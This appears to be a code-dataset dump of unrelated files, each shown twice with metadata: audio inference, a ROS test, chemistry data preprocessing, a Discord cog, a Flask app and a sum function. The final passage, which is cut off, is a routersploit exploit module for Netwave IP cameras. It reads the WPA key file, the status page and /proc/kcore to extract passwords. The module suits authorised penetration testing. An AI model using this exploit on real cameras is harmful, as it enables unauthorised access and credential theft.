for noisy, name in tqdm(self.dataloader, desc="Inference"):
assert len(name) == 1, "The batch size of inference stage must 1."
name = name[0]
enhanced = getattr(self, inference_type)(noisy.to(self.device), inference_args)
if abs(enhanced).any() > 1:
print(f"Warning: enhanced is not in the range [-1, 1], {name}")
amp = np.iinfo(np.int16).max
enhanced = np.int16(0.8 * amp * enhanced / np.max(np.abs(enhanced)))
sf.write(self.enhanced_dir / f"{name}.wav", enhanced, samplerate=self.acoustic_config["sr"])
noisy = noisy.detach().squeeze(0).numpy()
if np.ndim(noisy) > 1:
noisy = noisy[0, :] # first channel
noisy = noisy[:enhanced.shape[-1]]
sf.write(self.noisy_dir / f"{name}.wav", noisy, samplerate=self.acoustic_config["sr"])
if __name__ == '__main__':
ipt = torch.rand(10, 1, 257, 100)
opt = BaseInferencer._unfold_along_time(ipt, 30)
print(opt.shape) | 3,846 | 3,497 | 23 |
eba865e72fedda4b6e07ef427f423c883f1ecadc | 2,995 | py | Python | scalable_individual_tests/test/test_skiros2.py | ScalABLE40/scalable_tests | ce6bcd3343d360d05310b9d8d09328bdded0ec1e | [
"Apache-2.0"
] | null | null | null | scalable_individual_tests/test/test_skiros2.py | ScalABLE40/scalable_tests | ce6bcd3343d360d05310b9d8d09328bdded0ec1e | [
"Apache-2.0"
] | null | null | null | scalable_individual_tests/test/test_skiros2.py | ScalABLE40/scalable_tests | ce6bcd3343d360d05310b9d8d09328bdded0ec1e | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
import rospy
import sys
import unittest
import threading
from turtlesim.msg import Pose
from geometry_msgs.msg import Twist
from skiros2_skill.ros.skill_layer_interface import SkillLayerInterface
PKG = 'integration_tests'
NAME = 'test_integration_tm'
## A sample python unit test
if __name__ == '__main__':
import rostest
rostest.rosrun(PKG, NAME, 'test_skiros2.SuiteTest', sys.argv)
| 33.651685 | 101 | 0.674791 | #!/usr/bin/env python
import rospy
import sys
import unittest
import threading
from turtlesim.msg import Pose
from geometry_msgs.msg import Twist
from skiros2_skill.ros.skill_layer_interface import SkillLayerInterface
PKG = 'integration_tests'
NAME = 'test_integration_tm'
## A sample python unit test
class TestSkiros2(unittest.TestCase):
@classmethod
def setUpClass(cls):
rospy.init_node('testing_node')
cls.sli = SkillLayerInterface()
rospy.wait_for_message("turtle1/pose", Pose, 10.0)
rospy.wait_for_service('/tts_robot/command', 10.0)
rospy.wait_for_service('/wm/get', 10.0)
rospy.sleep(5.0)
cls.event = threading.Event()
def setUp(self):
self.sli.set_monitor_cb(self._monitor_cb)
def tearDown(self):
self.sli.set_monitor_cb(None)
self.event.clear()
self.new_message = None
def _check_turtle_pose_published(self, turtle="turtle1"):
message = rospy.wait_for_message("%s/pose" % (turtle), Pose, 1.0)
return True, message
def _check_turtle_cmd_vel_published(self, turtle="turtle1"):
message = rospy.wait_for_message("%s/cmd_vel" % (turtle), Twist, 1.0)
return True, message
def _monitor_cb(self, message):
self.new_message = message
self.event.set()
def test_1(self):
result, message = self._check_turtle_pose_published()
self.assertTrue(result)
self.assertAlmostEqual(message.x, 5.5, delta=0.1)
self.assertAlmostEqual(message.y, 5.5, delta=0.1)
self.assertAlmostEqual(message.theta, 0.0, delta=0.1)
rospy.wait_for_service('/tts_robot/command', 1.0)
rospy.wait_for_service('/wm/get', 1.0)
def test_2(self):
agent0 = self.sli.agents['/tts_robot']
agent0skills = agent0.skills #Get all skills of the first skill manager
execution_id = self.sli.execute(agent0.name, [agent0skills['wander_around']])#Execute a skill
self._check_turtle_cmd_vel_published()
if not(self.event.wait(1.0)):
self.fail("No Monitored Callback")
rospy.sleep(1.0)
self.event.clear()
self.new_message = None
self.sli.preempt_one(tid=execution_id)
if not(self.event.wait(1.0)):
self.fail("No Monitored Callback after preemption")
self.assertEqual(self.new_message.progress_message, "Preempted")
result, message = self._check_turtle_pose_published()
self.assertAlmostEqual(message.x, 6.2, delta=0.1)
self.assertAlmostEqual(message.y, 5.5, delta=0.1)
class SuiteTest(unittest.TestSuite):
def __init__(self):
super(SuiteTest, self).__init__()
loader = unittest.TestLoader()
loader.sortTestMethodsUsing = None
testSkiros2 = loader.loadTestsFromTestCase(TestSkiros2)
self.addTests(testSkiros2)
if __name__ == '__main__':
import rostest
rostest.rosrun(PKG, NAME, 'test_skiros2.SuiteTest', sys.argv)
| 2,239 | 263 | 72 |
03fcf7a942c07ded7389e9ed4024b7d2bbb377e4 | 4,884 | py | Python | scripts/process_adsorbates.py | krylea/ocp | 00fc1df29731d70ff1b5cf8e9323d1d2f1f8e540 | [
"MIT"
] | null | null | null | scripts/process_adsorbates.py | krylea/ocp | 00fc1df29731d70ff1b5cf8e9323d1d2f1f8e540 | [
"MIT"
] | null | null | null | scripts/process_adsorbates.py | krylea/ocp | 00fc1df29731d70ff1b5cf8e9323d1d2f1f8e540 | [
"MIT"
] | null | null | null | from ocpmodels.preprocessing import AtomsToGraphs
from ocpmodels.datasets import SinglePointLmdbDataset, TrajectoryLmdbDataset
import ase.io
from ase.build import bulk
from ase.build import fcc100, add_adsorbate, molecule
from ase.constraints import FixAtoms
from ase.calculators.emt import EMT
from ase.optimize import BFGS
import matplotlib.pyplot as plt
import lmdb
import pickle
from tqdm import tqdm
import torch
import os
import glob
import re
import logging
import shutil
ADS_DL_LINK = "https://dl.fbaipublicfiles.com/opencatalystproject/data/per_adsorbate_is2res/"
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--root_dir', type=str, default="adsorbate-data")
args = parser.parse_args()
process_adsorbates(args.root_dir)
| 32.56 | 109 | 0.668919 | from ocpmodels.preprocessing import AtomsToGraphs
from ocpmodels.datasets import SinglePointLmdbDataset, TrajectoryLmdbDataset
import ase.io
from ase.build import bulk
from ase.build import fcc100, add_adsorbate, molecule
from ase.constraints import FixAtoms
from ase.calculators.emt import EMT
from ase.optimize import BFGS
import matplotlib.pyplot as plt
import lmdb
import pickle
from tqdm import tqdm
import torch
import os
import glob
import re
import logging
import shutil
ADS_DL_LINK = "https://dl.fbaipublicfiles.com/opencatalystproject/data/per_adsorbate_is2res/"
def uncompress_data(compressed_dir):
import scripts.uncompress as uncompress
parser = uncompress.get_parser()
args, _ = parser.parse_known_args()
args.ipdir = compressed_dir
args.opdir = compressed_dir + "_uncompressed"
uncompress.main(args)
return args.opdir
def download_ads(root_dir, ads_num):
download_link = ADS_DL_LINK + str(ads_num) + ".tar"
os.system(f"wget {download_link} -P {root_dir}")
filename = os.path.join(root_dir, os.path.basename(download_link))
if os.path.exists(filename):
logging.info("Extracting contents...")
os.system(f"tar -xvf {filename} -C {root_dir}")
os.remove(filename)
def read_trajectory_extract_features(a2g, traj_path):
traj = ase.io.read(traj_path, ":")
tags = traj[0].get_tags()
images = [traj[0], traj[-1]]
data_objects = a2g.convert_all(images, disable_tqdm=True)
data_objects[0].tags = torch.LongTensor(tags)
data_objects[1].tags = torch.LongTensor(tags)
return data_objects
def write_ads_to_lmdb(root_dir, ads_num):
with open(os.path.join(root_dir, str(ads_num), "system.txt")) as sysfile:
system_data = sysfile.readlines()
ref_energies = {}
for line in system_data:
id, energy = line.split(",")
id = int(re.findall(r'random([\d]*)', id)[0])
ref_energies[int(id)] = float(energy)
lmdb_path1 = os.path.join(root_dir, str(ads_num), str(ads_num) + ".lmdb")
lmdb_path2 = os.path.join(root_dir, str(ads_num) + ".lmdb")
if os.path.exists(lmdb_path1):
os.remove(lmdb_path1)
db = lmdb.open(
lmdb_path1,
map_size=1099511627776 * 2,
subdir=False,
meminit=False,
map_async=True,
)
a2g = AtomsToGraphs(
max_neigh=50,
radius=6,
r_energy=True, # False for test data
r_forces=True,
r_distances=False,
r_fixed=True,
)
traj_folder = os.path.join(root_dir, str(ads_num), str(ads_num)+"_uncompressed")
ads_files = glob.glob(os.path.join(traj_folder, "*.extxyz"))
for file in ads_files:
system_id = int(re.findall(r'random([\d]*)', file)[0])
ref_energy = ref_energies[system_id]
data_objects = read_trajectory_extract_features(a2g, file)
initial_struc = data_objects[0]
relaxed_struc = data_objects[1]
initial_struc.y_init = initial_struc.y - ref_energy # subtract off reference energy, if applicable
del initial_struc.y
initial_struc.y_relaxed = relaxed_struc.y - ref_energy # subtract off reference energy, if applicable
initial_struc.pos_relaxed = relaxed_struc.pos
initial_struc.sid = system_id
initial_struc.ads_num=ads_num
if initial_struc.edge_index.shape[1] == 0:
print("no neighbors", system_id)
continue
txn = db.begin(write=True)
txn.put(f"{system_id}".encode("ascii"), pickle.dumps(initial_struc, protocol=-1))
txn.commit()
db.sync()
db.close()
os.system(f"mv {lmdb_path1} {lmdb_path2}")
def process_adsorbates(root_dir, N_ADS=82):
os.makedirs(root_dir, exist_ok=True)
for i in range(N_ADS):
print(i)
ads_dir = os.path.join(root_dir, str(i))
lmdb_path = os.path.join(root_dir, str(i)+".lmdb")
if not os.path.exists(ads_dir) and not os.path.exists(lmdb_path):
download_ads(root_dir, i)
compressed_dir = os.path.join(ads_dir, str(i))
uncompressed_dir = os.path.join(ads_dir, str(i) + "_uncompressed")
if os.path.exists(compressed_dir) and not os.path.exists(uncompressed_dir):
_ = uncompress_data(compressed_dir)
shutil.rmtree(compressed_dir)
if not os.path.exists(lmdb_path) and os.path.exists(uncompressed_dir):
write_ads_to_lmdb(root_dir, i)
logging.info("Finished adsorbate %d" % i)
else:
logging.info("Skipping adsorbate %d" % i)
if os.path.exists(ads_dir):
shutil.rmtree(ads_dir)
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--root_dir', type=str, default="adsorbate-data")
args = parser.parse_args()
process_adsorbates(args.root_dir)
| 3,944 | 0 | 115 |
e10c0d431f4e1a04c9d593c344afdd2132cd7d07 | 8,225 | py | Python | transferchannel/transferchannel.py | AAA3A-AAA3A/AAA3A-cogs | 076ff390610e2470a086bdae41647ee21f01c323 | [
"MIT"
] | 1 | 2022-03-17T02:06:37.000Z | 2022-03-17T02:06:37.000Z | transferchannel/transferchannel.py | AAA3A-AAA3A/AAA3A-cogs | 076ff390610e2470a086bdae41647ee21f01c323 | [
"MIT"
] | 2 | 2022-03-07T03:29:33.000Z | 2022-03-17T06:51:43.000Z | transferchannel/transferchannel.py | AAA3A-AAA3A/AAA3A-cogs | 076ff390610e2470a086bdae41647ee21f01c323 | [
"MIT"
] | 2 | 2021-11-24T19:31:55.000Z | 2022-01-02T06:34:22.000Z | from .AAA3A_utils.cogsutils import CogsUtils # isort:skip
from redbot.core import commands # isort:skip
from redbot.core.i18n import Translator, cog_i18n # isort:skip
from redbot.core.bot import Red # isort:skip
import discord # isort:skip
import typing # isort:skip
from .helpers import embed_from_msg
from redbot.core.utils.tunnel import Tunnel
if CogsUtils().is_dpy2: # To remove
setattr(commands, 'Literal', typing.Literal)
# Credits:
# Thanks to TrustyJAID's Backup for starting the command to list the latest source channel messages! (https://github.com/TrustyJAID/Trusty-cogs/tree/master/backup)
# Thanks to QuoteTools from SimBad for the embed!
# Thanks to Speak from @epic guy for the webhooks! (https://github.com/npc203/npc-cogs/tree/main/speak)
# Thanks to Say from LaggronsDumb for the attachments in the single messages and webhooks! (https://github.com/laggron42/Laggrons-Dumb-Cogs/tree/v3/say)
# Thanks to CruxCraft on GitHub for the idea of allowing channels from other servers! (https://github.com/AAA3A-AAA3A/AAA3A-cogs/issues/1)
# Thanks to @epic guy on Discord for the basic syntax (command groups, commands) and also commands (await ctx.send, await ctx.author.send, await ctx.message.delete())!
# Thanks to the developers of the cogs I added features to as it taught me how to make a cog! (Chessgame by WildStriker, Captcha by Kreusada, Speak by Epic guy and Rommer by Dav)
# Thanks to all the people who helped me with some commands in the #coding channel of the redbot support server!
_ = Translator("TransferChannel", __file__)
@cog_i18n(_)
class TextChannelGuildConverter(discord.ext.commands.TextChannelConverter):
"""Similar to d.py's TextChannelConverter but only returns if we have already
passed our hierarchy checks and find in all guilds.
"""
class TransferChannel(commands.Cog):
"""A cog to transfer all messages channel in a other channel!"""
@commands.command(aliases=["channeltransfer"])
@commands.admin_or_permissions(manage_guild=True)
@commands.guild_only()
async def transferchannel(self, ctx: commands.Context, source: TextChannelGuildConverter, destination: TextChannelGuildConverter, limit: int, way: commands.Literal["embed", "webhook", "message"]):
"""
Transfer all messages channel in a other channel. This might take a long time.
You can specify the id of a channel from another server.
`source` is partial name or ID of the source channel
`destination` is partial name or ID of the destination channel
`way` is the used way
- `embed` Do you want to transfer the message as an embed?
- `webhook` Do you want to send the messages with webhooks (name and avatar of the original author)?
- `message`Do you want to transfer the message as a simple message?
"""
permissions = destination.permissions_for(destination.guild.me)
if way == "embed":
if not permissions.embed_links:
await ctx.send(_("I need to have all the following permissions for the {destination.name} channel ({destination.id}) in {destination.guild.name} ({destination.guild.id}).\n`embed_links`.").format(**locals()))
return
elif way == "webhook":
if not permissions.manage_guild:
await ctx.send(_("I need to have all the following permissions for the {destination.name} channel ({destination.id}) in {destination.guild.name} ({destination.guild.id}).\n`manage_channels`").format(**locals()))
return
count = 0
if self.cogsutils.is_dpy2:
msgList = [message async for message in source.history(limit=limit + 1, oldest_first=False)]
else:
msgList = await source.history(limit=limit + 1, oldest_first=False).flatten()
msgList.reverse()
for message in msgList:
if not message.id == ctx.message.id:
count += 1
files = await Tunnel.files_from_attatch(message)
if way == "embed":
em = embed_from_msg(message, self.cogsutils)
await destination.send(embed=em)
elif way == "webhook":
hook = await self.cogsutils.get_hook(destination)
await hook.send(
username=message.author.display_name,
avatar_url=message.author.display_avatar if self.cogsutils.is_dpy2 else message.author.avatar_url,
content=message.content,
files=files,
)
elif way == "message":
iso_format = message.created_at.isoformat()
msg1 = "\n".join(
[
_("**Author:** {message.author}({message.author.id}").format(**locals()),
_("**Channel:** <#{message.channel.id}>").format(**locals()),
_("**Time(UTC):** {isoformat}").format(**locals())
]
)
if len(msg1) + len(message.content) < 2000:
await ctx.send(msg1 + "\n\n" + message.content, files=files)
else:
await ctx.send(msg1)
await ctx.send(message.content, files=files)
await ctx.send(_("{count} messages transfered from {source.mention} to {destination.mention}").format(**locals())) | 62.78626 | 299 | 0.643161 | from .AAA3A_utils.cogsutils import CogsUtils # isort:skip
from redbot.core import commands # isort:skip
from redbot.core.i18n import Translator, cog_i18n # isort:skip
from redbot.core.bot import Red # isort:skip
import discord # isort:skip
import typing # isort:skip
from .helpers import embed_from_msg
from redbot.core.utils.tunnel import Tunnel
if CogsUtils().is_dpy2: # To remove
setattr(commands, 'Literal', typing.Literal)
# Credits:
# Thanks to TrustyJAID's Backup for starting the command to list the latest source channel messages! (https://github.com/TrustyJAID/Trusty-cogs/tree/master/backup)
# Thanks to QuoteTools from SimBad for the embed!
# Thanks to Speak from @epic guy for the webhooks! (https://github.com/npc203/npc-cogs/tree/main/speak)
# Thanks to Say from LaggronsDumb for the attachments in the single messages and webhooks! (https://github.com/laggron42/Laggrons-Dumb-Cogs/tree/v3/say)
# Thanks to CruxCraft on GitHub for the idea of allowing channels from other servers! (https://github.com/AAA3A-AAA3A/AAA3A-cogs/issues/1)
# Thanks to @epic guy on Discord for the basic syntax (command groups, commands) and also commands (await ctx.send, await ctx.author.send, await ctx.message.delete())!
# Thanks to the developers of the cogs I added features to as it taught me how to make a cog! (Chessgame by WildStriker, Captcha by Kreusada, Speak by Epic guy and Rommer by Dav)
# Thanks to all the people who helped me with some commands in the #coding channel of the redbot support server!
_ = Translator("TransferChannel", __file__)
@cog_i18n(_)
class TextChannelGuildConverter(discord.ext.commands.TextChannelConverter):
"""Similar to d.py's TextChannelConverter but only returns if we have already
passed our hierarchy checks and find in all guilds.
"""
async def convert(self, ctx: commands.Context, argument: str) -> discord.TextChannel:
try:
channel: discord.TextChannel = await discord.ext.commands.TextChannelConverter().convert(ctx, argument)
except Exception:
channel = None
if channel is not None:
if channel.guild == ctx.guild:
if ctx.author.id not in ctx.bot.owner_ids and not channel.permissions_for(ctx.author).manage_guild:
raise discord.ext.commands.BadArgument(_("You must have permissions to manage this server to use this command.").format(**locals()))
permissions = channel.permissions_for(channel.guild.me)
if not permissions.read_messages or not permissions.read_message_history or not permissions.send_messages or not permissions.view_channel:
raise discord.ext.commands.BadArgument(_("I need to have all the following permissions for the {channel.mention} channel ({channel.id}).\n`read_messages`, `read_message_history`, `send_messages` and `view_channel`.").format(**locals()))
return channel
if ctx.author.id not in ctx.bot.owner_ids:
raise discord.ext.commands.BadArgument(_("This channel cannot be found.").format(**locals()))
try:
argument = int(argument)
except NameError:
pass
channel: discord.TextChannel = ctx.bot.get_channel(argument)
if channel is None:
raise discord.ext.commands.BadArgument(_("This channel cannot be found. If this channel is in another Discord server, please give the id of a valid text channel.").format(**locals()))
if not isinstance(channel, discord.TextChannel):
raise discord.ext.commands.BadArgument(_("The specified channel must be a text channel in a server where the bot is located.").format(**locals()))
permissions = channel.permissions_for(channel.guild.me)
if not permissions.read_messages or not permissions.read_message_history or not permissions.send_messages or not permissions.view_channel:
raise discord.ext.commands.BadArgument(_("I need to have all the following permissions for the {channel.name} channel ({channel.id}) in {destination.guild.name} ({destination.guild.id}).\n`read_messages`, `read_message_history`, `send_messages` and `view_channel`.").format(**locals()))
return channel
class TransferChannel(commands.Cog):
"""A cog to transfer all messages channel in a other channel!"""
def __init__(self, bot):
self.bot: Red = bot
self.cache = {}
self.cogsutils = CogsUtils(cog=self)
self.cogsutils._setup()
@commands.command(aliases=["channeltransfer"])
@commands.admin_or_permissions(manage_guild=True)
@commands.guild_only()
async def transferchannel(self, ctx: commands.Context, source: TextChannelGuildConverter, destination: TextChannelGuildConverter, limit: int, way: commands.Literal["embed", "webhook", "message"]):
"""
Transfer all messages channel in a other channel. This might take a long time.
You can specify the id of a channel from another server.
`source` is partial name or ID of the source channel
`destination` is partial name or ID of the destination channel
`way` is the used way
- `embed` Do you want to transfer the message as an embed?
- `webhook` Do you want to send the messages with webhooks (name and avatar of the original author)?
- `message`Do you want to transfer the message as a simple message?
"""
permissions = destination.permissions_for(destination.guild.me)
if way == "embed":
if not permissions.embed_links:
await ctx.send(_("I need to have all the following permissions for the {destination.name} channel ({destination.id}) in {destination.guild.name} ({destination.guild.id}).\n`embed_links`.").format(**locals()))
return
elif way == "webhook":
if not permissions.manage_guild:
await ctx.send(_("I need to have all the following permissions for the {destination.name} channel ({destination.id}) in {destination.guild.name} ({destination.guild.id}).\n`manage_channels`").format(**locals()))
return
count = 0
if self.cogsutils.is_dpy2:
msgList = [message async for message in source.history(limit=limit + 1, oldest_first=False)]
else:
msgList = await source.history(limit=limit + 1, oldest_first=False).flatten()
msgList.reverse()
for message in msgList:
if not message.id == ctx.message.id:
count += 1
files = await Tunnel.files_from_attatch(message)
if way == "embed":
em = embed_from_msg(message, self.cogsutils)
await destination.send(embed=em)
elif way == "webhook":
hook = await self.cogsutils.get_hook(destination)
await hook.send(
username=message.author.display_name,
avatar_url=message.author.display_avatar if self.cogsutils.is_dpy2 else message.author.avatar_url,
content=message.content,
files=files,
)
elif way == "message":
iso_format = message.created_at.isoformat()
msg1 = "\n".join(
[
_("**Author:** {message.author}({message.author.id}").format(**locals()),
_("**Channel:** <#{message.channel.id}>").format(**locals()),
_("**Time(UTC):** {isoformat}").format(**locals())
]
)
if len(msg1) + len(message.content) < 2000:
await ctx.send(msg1 + "\n\n" + message.content, files=files)
else:
await ctx.send(msg1)
await ctx.send(message.content, files=files)
await ctx.send(_("{count} messages transfered from {source.mention} to {destination.mention}").format(**locals())) | 2,562 | 0 | 58 |
3ae75d8b75ea2eb0be1ad6128bc5b65fc54e72ec | 1,159 | py | Python | server.py | Benjadahl/BenjaWorld | c07cd5bc0960db81d0462e87793ec1af7885c3fb | [
"Apache-2.0"
] | null | null | null | server.py | Benjadahl/BenjaWorld | c07cd5bc0960db81d0462e87793ec1af7885c3fb | [
"Apache-2.0"
] | null | null | null | server.py | Benjadahl/BenjaWorld | c07cd5bc0960db81d0462e87793ec1af7885c3fb | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
#Import packages
from flask import *
#Import local packages
import dbHandler as db
#Start flask app
app = Flask(__name__)
#Default index page
@app.route('/')
#The town page, the game will automatically direct the page to your town when accesing this URL
@app.route('/login/')
#The town page, the game will automatically direct the page to your town when accesing this URL
@app.route('/town/')
@app.route('/group/')
@app.route('/g/<username>')
#Post requests
@app.route('/login/', methods=['POST'])
if __name__ == "__main__":
#Initailize the database
db.init("./database/")
#db.end()
app.run(debug=True, host="0.0.0.0")
| 23.18 | 95 | 0.69025 | #!/usr/bin/env python3
#Import packages
from flask import *
#Import local packages
import dbHandler as db
#Start flask app
app = Flask(__name__)
#Default index page
@app.route('/')
def showStart():
return render_template("index.html")
#The town page, the game will automatically direct the page to your town when accesing this URL
@app.route('/login/')
def showLogin():
resp = make_response(render_template("login.html"))
resp.cache_control.no_cache = True
return resp
#The town page, the game will automatically direct the page to your town when accesing this URL
@app.route('/town/')
def showTown():
return render_template("town.html")
@app.route('/group/')
def showGroup():
return render_template("group.html")
@app.route('/g/<username>')
def showUser(username):
return "This is the group of: " + username
#Post requests
@app.route('/login/', methods=['POST'])
def login():
print("lel")
db.newGroup(str(request.json["userID"]))
print(request.json)
return "Login: "
if __name__ == "__main__":
#Initailize the database
db.init("./database/")
#db.end()
app.run(debug=True, host="0.0.0.0")
| 359 | 0 | 132 |
21d106280f96337744d3d15fd3da390137d948df | 1,046 | py | Python | INF101/TP/TP6/2.6.1.4_mirror.py | Marshellson/UGA_IMF | eb293deabcc5ef6e45617d8c5bb6268b63b34f21 | [
"MIT"
] | 1 | 2021-09-21T21:53:17.000Z | 2021-09-21T21:53:17.000Z | INF101/TP/TP6/2.6.1.4_mirror.py | Marshellson/UGA_INF | eb293deabcc5ef6e45617d8c5bb6268b63b34f21 | [
"MIT"
] | null | null | null | INF101/TP/TP6/2.6.1.4_mirror.py | Marshellson/UGA_INF | eb293deabcc5ef6e45617d8c5bb6268b63b34f21 | [
"MIT"
] | null | null | null | '''
Author: JIANG Yilun
Date: 2022-02-21 15:13:14
LastEditTime: 2022-02-21 15:16:30
LastEditors: JIANG Yilun
Description:
FilePath: /UGA_INF/INF101/TP/TP6/2.6.1.4_mirror.py
'''
import sys
import math
# Auto-generated code below aims at helping you parse
# the standard input according to the problem statement.
n = int(input()) # the number of temperatures to analyse
temp = []
for i in input().split():
# t: a temperature expressed as an integer ranging from -273 to 5526
t = int(i)
temp.append(t)
# Write an answer using print
# To debug: print("Debug messages...", file=sys.stderr, flush=True)
print(proche_zero(temp)) | 26.820513 | 72 | 0.646272 | '''
Author: JIANG Yilun
Date: 2022-02-21 15:13:14
LastEditTime: 2022-02-21 15:16:30
LastEditors: JIANG Yilun
Description:
FilePath: /UGA_INF/INF101/TP/TP6/2.6.1.4_mirror.py
'''
import sys
import math
# Auto-generated code below aims at helping you parse
# the standard input according to the problem statement.
n = int(input()) # the number of temperatures to analyse
temp = []
for i in input().split():
# t: a temperature expressed as an integer ranging from -273 to 5526
t = int(i)
temp.append(t)
# Write an answer using print
# To debug: print("Debug messages...", file=sys.stderr, flush=True)
def proche_zero(list):
try:
temp_temperature = list[0]
for i in range(len(list)):
if abs(list[i]) < abs(temp_temperature):
temp_temperature = list[i]
if abs(list[i]) == abs(temp_temperature):
if list[i] > temp_temperature:
temp_temperature = list[i]
except:
print("0")
return temp_temperature
print(proche_zero(temp)) | 383 | 0 | 23 |
0923b4b9e6beca141814053d0ad67f5a6310a74b | 495 | py | Python | students/k3342/laboratory_works/Shaidullina_Regina/laboratory_work_1/leaderboard/urls.py | TonikX/ITMO_ICT_-WebProgramming_2020 | ba566c1b3ab04585665c69860b713741906935a0 | [
"MIT"
] | 10 | 2020-03-20T09:06:12.000Z | 2021-07-27T13:06:02.000Z | students/k3342/laboratory_works/Shaidullina_Regina/laboratory_work_1/leaderboard/urls.py | TonikX/ITMO_ICT_-WebProgramming_2020 | ba566c1b3ab04585665c69860b713741906935a0 | [
"MIT"
] | 134 | 2020-03-23T09:47:48.000Z | 2022-03-12T01:05:19.000Z | students/k3342/laboratory_works/Shaidullina_Regina/laboratory_work_1/leaderboard/urls.py | TonikX/ITMO_ICT_-WebProgramming_2020 | ba566c1b3ab04585665c69860b713741906935a0 | [
"MIT"
] | 71 | 2020-03-20T12:45:56.000Z | 2021-10-31T19:22:25.000Z | from django.contrib import admin
from django.urls import path
from leaderboard import views
from django.contrib.auth.views import LoginView #, LogoutView
urlpatterns = [
path('', views.main, name='main'),
path('leaderboard/', views.leaderboard_view, name='leaderboard'),
path('comments/', views.comments, name='comments'),
path('register/', views.reg, name='register'),
path('login/', LoginView.as_view(), name='login'),
path('logout/', views.LogoutFormView.as_view(), name='logout'),
]
| 35.357143 | 66 | 0.729293 | from django.contrib import admin
from django.urls import path
from leaderboard import views
from django.contrib.auth.views import LoginView #, LogoutView
urlpatterns = [
path('', views.main, name='main'),
path('leaderboard/', views.leaderboard_view, name='leaderboard'),
path('comments/', views.comments, name='comments'),
path('register/', views.reg, name='register'),
path('login/', LoginView.as_view(), name='login'),
path('logout/', views.LogoutFormView.as_view(), name='logout'),
]
| 0 | 0 | 0 |
8e52a4f5718b64fe398109099129281604f196a7 | 456 | py | Python | lib/solutions/SUM/sum_solution.py | DPNT-Sourcecode/CHK-pttv01 | caf1e37c53cee5ab4844a6c9a5f7d904b1461fb0 | [
"Apache-2.0"
] | null | null | null | lib/solutions/SUM/sum_solution.py | DPNT-Sourcecode/CHK-pttv01 | caf1e37c53cee5ab4844a6c9a5f7d904b1461fb0 | [
"Apache-2.0"
] | null | null | null | lib/solutions/SUM/sum_solution.py | DPNT-Sourcecode/CHK-pttv01 | caf1e37c53cee5ab4844a6c9a5f7d904b1461fb0 | [
"Apache-2.0"
] | null | null | null | #!/usr/local/bin/python3
# noinspection PyShadowingBuiltins,PyUnusedLocal
def compute(val1, val2):
'''
Function returning the sum of two parameters.
Args:
val1 : Integer between 0 and 100.
val2 : Integer between 0 and 100.
Return:
Integer : Sum of val1 and val2.
'''
return val1 + val2;
if __name__ == '__main__':
# Tests.
print("1 + 3 = {}".format(sum(1,3)))
print("0 + 0 = {}".format(sum(0,0)))
| 24 | 49 | 0.600877 | #!/usr/local/bin/python3
# noinspection PyShadowingBuiltins,PyUnusedLocal
def compute(val1, val2):
'''
Function returning the sum of two parameters.
Args:
val1 : Integer between 0 and 100.
val2 : Integer between 0 and 100.
Return:
Integer : Sum of val1 and val2.
'''
return val1 + val2;
if __name__ == '__main__':
# Tests.
print("1 + 3 = {}".format(sum(1,3)))
print("0 + 0 = {}".format(sum(0,0)))
| 0 | 0 | 0 |
50d8c128a8e03e7ecb47c79702d9322f7100c752 | 3,128 | py | Python | DIZED_APPS/INCANTATION/routersploit/modules/exploits/cameras/multi/netwave_IP_camera.py | tanc7/ArmsCommander-TestBed | e00bb166084735d8b0de058b54d6d98a057cd7d8 | [
"FSFUL"
] | 1 | 2018-10-17T04:49:42.000Z | 2018-10-17T04:49:42.000Z | DIZED_APPS/INCANTATION/routersploit/modules/exploits/cameras/multi/netwave_IP_camera.py | tanc7/ArmsCommander-TestBed | e00bb166084735d8b0de058b54d6d98a057cd7d8 | [
"FSFUL"
] | null | null | null | DIZED_APPS/INCANTATION/routersploit/modules/exploits/cameras/multi/netwave_IP_camera.py | tanc7/ArmsCommander-TestBed | e00bb166084735d8b0de058b54d6d98a057cd7d8 | [
"FSFUL"
] | null | null | null | from routersploit import (
exploits,
print_error,
print_success,
print_info,
print_status,
http_request,
mute,
validators,
)
class Exploit(exploits.Exploit):
"""
Netwave IP Camera - Password Disclosure
"""
__info__ = {
'name': 'Netwave_IP_camera',
'description': 'This exploit will try to retrieve WPA password and ddns host name, '
'Also it would try to read memory leak in order to find username and password',
'authors': [
'renos stoikos <rstoikos[at]gmail.com>', # routesploit module
'spiritnull', # exploit-db.com exploit
],
'references': [
'https://www.exploit-db.com/exploits/41236/',
],
'devices': [
'Netwave IP Camera',
],
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
port = exploits.Option(80, 'Target port', validators=validators.integer) # default port
@mute
| 37.686747 | 119 | 0.582161 | from routersploit import (
exploits,
print_error,
print_success,
print_info,
print_status,
http_request,
mute,
validators,
)
class Exploit(exploits.Exploit):
"""
Netwave IP Camera - Password Disclosure
"""
__info__ = {
'name': 'Netwave_IP_camera',
'description': 'This exploit will try to retrieve WPA password and ddns host name, '
'Also it would try to read memory leak in order to find username and password',
'authors': [
'renos stoikos <rstoikos[at]gmail.com>', # routesploit module
'spiritnull', # exploit-db.com exploit
],
'references': [
'https://www.exploit-db.com/exploits/41236/',
],
'devices': [
'Netwave IP Camera',
],
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
port = exploits.Option(80, 'Target port', validators=validators.integer) # default port
def run(self):
if self.check():
print_success("Target is vulnerable")
url1 = "{}:{}//etc/RT2870STA.dat".format(self.target, self.port)
url2 = "{}:{}/get_status.cgi".format(self.target, self.port)
url3 = "{}:{}//proc/kcore".format(self.target, self.port)
response = http_request(method="GET", url=url1)
if response is not None and "WPAPSK" in response.text:
print_success("WPA Password is in this text:")
print_info(response.text)
else:
print_error("Could not find WPA password")
print_info("Trying to gather more info")
response = http_request(method="GET", url=url2)
if response is not None and "ddns_host" in response.text:
print_success("ddns host name:")
print_info(response.text)
else:
print_error("could not read ddns host name")
print_status("Trying to find username and password from running memory leak")
print_status("This could take some time")
print_status("password is usually stuck next to 'admin' e.g admin123456")
response = http_request(method="GET", url=url3, stream=True)
try:
for chunk in response.iter_content(chunk_size=100):
if "admin" in chunk:
print_success(chunk)
except Exception:
print_error("Exploit failed - could not read /proc/kcore")
@mute
def check(self):
url1 = "{}:{}//etc/RT2870STA.dat".format(self.target, self.port)
url2 = "{}:{}/get_status.cgi".format(self.target, self.port)
